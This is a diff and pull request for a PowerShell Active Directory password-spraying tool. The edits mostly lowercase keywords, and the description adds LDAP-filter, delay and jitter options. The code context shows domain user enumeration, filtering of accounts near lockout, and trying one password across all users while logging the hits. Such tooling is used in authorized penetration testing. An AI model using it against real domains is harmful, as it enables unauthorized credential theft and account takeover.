-    If ($OutFile -ne "")
+    if ($OutFile -ne "")
     {
         Write-Host -ForegroundColor Yellow "[*] Any passwords that were successfully sprayed have been output to $OutFile"
     }
@@ -197,7 +197,7 @@ function Invoke-DomainPasswordSpray{
 
 Function Countdown-Timer
 {
-    Param(
+    param(
         $Seconds = 1800,
         $Message = "[*] Pausing to avoid account lockout."
     )
@@ -254,7 +254,7 @@ Function Get-DomainUserList{
     This command will gather a userlist from the domain "domainname" including any accounts that are not disabled and are not close to locking out. It will write them to a file at "userlist.txt"
 
     #>
-    Param(
+    param(
      [Parameter(Position = 0, Mandatory = $false)]
      [string]
      $Domain = "",
@@ -270,7 +270,7 @@ Function Get-DomainUserList{
 
     if ($Domain -ne "")
     {
-        Try
+        try
         {
             # Using domain specified with -Domain option
             $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
@@ -285,7 +285,7 @@ Function Get-DomainUserList{
     }
     else
     {
-        Try
+        try
         {
             # Trying to use the current user's domain
             $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
@@ -360,7 +360,7 @@ Function Get-DomainUserList{
     $UserSearcher.PropertiesToLoad.Add("badpwdcount") > $Null
     $UserSearcher.PropertiesToLoad.Add("badpasswordtime") > $Null
 
-    If ($RemoveDisabled){
+    if ($RemoveDisabled){
         Write-Host -ForegroundColor "yellow" "[*] Removing disabled users from list."
         # More precise LDAP filter UAC check for users that are disabled (Joff Thyer)
         # LDAP 1.2.840.113556.1.4.803 means bitwise &
@@ -380,7 +380,7 @@ Function Get-DomainUserList{
     Write-Host -ForegroundColor "yellow" ("[*] There are " + $AllUserObjects.count + " total users found.")
     $UserListArray = @()
 
-    If ($RemovePotentialLockouts)
+    if ($RemovePotentialLockouts)
     {
         Write-Host -ForegroundColor "yellow" "[*] Removing users within 1 attempt of locking out from list."
         Foreach ($user in $AllUserObjects)
@@ -436,7 +436,7 @@ function Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Password)
 
     ForEach($User in $UserListArray){
         $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain,$User,$Password)
-        If ($Domain_check.name -ne $null)
+        if ($Domain_check.name -ne $null)
         {
             if ($OutFile -ne "")
             {


### PR DESCRIPTION
Sorry for such a big changeset in one PR.

This adds three options to `Invoke-DomainPasswordSpray`: -Filter, -Delay, and -Jitter

The first lets you add an LDAP filter in addition to the filter for disabled and locked-out users, so you can do things like this:
```
Invoke-DomainPasswordSpray -Filter '(description=*admin*)'
```

The other two new options work exactly [like they do in PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1#L9966) -- sleep in between requests `$Delay` seconds plus or minus `$Jitter`. 